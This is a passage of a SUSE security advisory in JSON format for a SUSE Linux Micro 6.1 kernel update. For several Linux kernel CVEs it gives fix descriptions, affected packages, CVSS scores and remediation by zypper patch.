"category": "external",
"summary": "SUSE Bug 1255932 for CVE-2025-68766",
"url": "https://bugzilla.suse.com/1255932"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68766"
},
{
"cve": "CVE-2025-68768",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68768"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninet: frags: flush pending skbs in fqdir_pre_exit()\n\nWe have been seeing occasional deadlocks on pernet_ops_rwsem since\nSeptember in NIPA. The stuck task was usually modprobe (often loading\na driver like ipvlan), trying to take the lock as a Writer.\nlockdep does not track readers for rwsems so the read wasn\u0027t obvious\nfrom the reports.\n\nOn closer inspection the Reader holding the lock was conntrack looping\nforever in nf_conntrack_cleanup_net_list(). Based on past experience\nwith occasional NIPA crashes I looked thru the tests which run before\nthe crash and noticed that the crash follows ip_defrag.sh. An immediate\nred flag. Scouring thru (de)fragmentation queues reveals skbs sitting\naround, holding conntrack references.\n\nThe problem is that since conntrack depends on nf_defrag_ipv6,\nnf_defrag_ipv6 will load first. Since nf_defrag_ipv6 loads first its\nnetns exit hooks run _after_ conntrack\u0027s netns exit hook.\n\nFlush all fragment queue SKBs during fqdir_pre_exit() to release\nconntrack references before conntrack cleanup runs. Also flush\nthe queues in timer expiry handlers when they discover fqdir-\u003edead\nis set, in case packet sneaks in while we\u0027re running the pre_exit\nflush.\n\nThe commit under Fixes is not exactly the culprit, but I think\npreviously the timer firing would eventually unblock the spinning\nconntrack.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68768",
"url": "https://www.suse.com/security/cve/CVE-2025-68768"
},
{
"category": "external",
"summary": "SUSE Bug 1256579 for CVE-2025-68768",
"url": "https://bugzilla.suse.com/1256579"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68768"
},
{
"cve": "CVE-2025-68770",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68770"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbnxt_en: Fix XDP_TX path\n\nFor XDP_TX action in bnxt_rx_xdp(), clearing of the event flags is not\ncorrect. __bnxt_poll_work() -\u003e bnxt_rx_pkt() -\u003e bnxt_rx_xdp() may be\nlooping within NAPI and some event flags may be set in earlier\niterations. In particular, if BNXT_TX_EVENT is set earlier indicating\nsome XDP_TX packets are ready and pending, it will be cleared if it is\nXDP_TX action again. Normally, we will set BNXT_TX_EVENT again when we\nsuccessfully call __bnxt_xmit_xdp(). But if the TX ring has no more\nroom, the flag will not be set. This will cause the TX producer to be\nahead but the driver will not hit the TX doorbell.\n\nFor multi-buf XDP_TX, there is no need to clear the event flags and set\nBNXT_AGG_EVENT. The BNXT_AGG_EVENT flag should have been set earlier in\nbnxt_rx_pkt().\n\nThe visible symptom of this is that the RX ring associated with the\nTX XDP ring will eventually become empty and all packets will be dropped.\nBecause this condition will cause the driver to not refill the RX ring\nseeing that the TX ring has forever pending XDP_TX packets.\n\nThe fix is to only clear BNXT_RX_EVENT when we have successfully\ncalled __bnxt_xmit_xdp().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68770",
"url": "https://www.suse.com/security/cve/CVE-2025-68770"
},
{
"category": "external",
"summary": "SUSE Bug 1256584 for CVE-2025-68770",
"url": "https://bugzilla.suse.com/1256584"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68770"
},
{
"cve": "CVE-2025-68771",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68771"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: fix kernel BUG in ocfs2_find_victim_chain\n\nsyzbot reported a kernel BUG in ocfs2_find_victim_chain() because the\n`cl_next_free_rec` field of the allocation chain list (next free slot in\nthe chain list) is 0, triggring the BUG_ON(!cl-\u003ecl_next_free_rec)\ncondition in ocfs2_find_victim_chain() and panicking the kernel.\n\nTo fix this, an if condition is introduced in ocfs2_claim_suballoc_bits(),\njust before calling ocfs2_find_victim_chain(), the code block in it being\nexecuted when either of the following conditions is true:\n\n1. `cl_next_free_rec` is equal to 0, indicating that there are no free\nchains in the allocation chain list\n2. `cl_next_free_rec` is greater than `cl_count` (the total number of\nchains in the allocation chain list)\n\nEither of them being true is indicative of the fact that there are no\nchains left for usage.\n\nThis is addressed using ocfs2_error(), which prints\nthe error log for debugging purposes, rather than panicking the kernel.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68771",
"url": "https://www.suse.com/security/cve/CVE-2025-68771"
},
{
"category": "external",
"summary": "SUSE Bug 1256582 for CVE-2025-68771",
"url": "https://bugzilla.suse.com/1256582"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68771"
},
{
"cve": "CVE-2025-68773",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68773"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: fsl-cpm: Check length parity before switching to 16 bit mode\n\nCommit fc96ec826bce (\"spi: fsl-cpm: Use 16 bit mode for large transfers\nwith even size\") failed to make sure that the size is really even\nbefore switching to 16 bit mode. Until recently the problem went\nunnoticed because kernfs uses a pre-allocated bounce buffer of size\nPAGE_SIZE for reading EEPROM.\n\nBut commit 8ad6249c51d0 (\"eeprom: at25: convert to spi-mem API\")\nintroduced an additional dynamically allocated bounce buffer whose size\nis exactly the size of the transfer, leading to a buffer overrun in\nthe fsl-cpm driver when that size is odd.\n\nAdd the missing length parity verification and remain in 8 bit mode\nwhen the length is not even.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68773",
"url": "https://www.suse.com/security/cve/CVE-2025-68773"
},
{
"category": "external",
"summary": "SUSE Bug 1256586 for CVE-2025-68773",
"url": "https://bugzilla.suse.com/1256586"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68773"
},
{
"cve": "CVE-2025-68775",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68775"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/handshake: duplicate handshake cancellations leak socket\n\nWhen a handshake request is cancelled it is removed from the\nhandshake_net-\u003ehn_requests list, but it is still present in the\nhandshake_rhashtbl until it is destroyed.\n\nIf a second cancellation request arrives for the same handshake request,\nthen remove_pending() will return false... and assuming\nHANDSHAKE_F_REQ_COMPLETED isn\u0027t set in req-\u003ehr_flags, we\u0027ll continue\nprocessing through the out_true label, where we put another reference on\nthe sock and a refcount underflow occurs.\n\nThis can happen for example if a handshake times out - particularly if\nthe SUNRPC client sends the AUTH_TLS probe to the server but doesn\u0027t\nfollow it up with the ClientHello due to a problem with tlshd. When the\ntimeout is hit on the server, the server will send a FIN, which triggers\na cancellation request via xs_reset_transport(). When the timeout is\nhit on the client, another cancellation request happens via\nxs_tls_handshake_sync().\n\nAdd a test_and_set_bit(HANDSHAKE_F_REQ_COMPLETED) in the pending cancel\npath so duplicate cancels can be detected.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
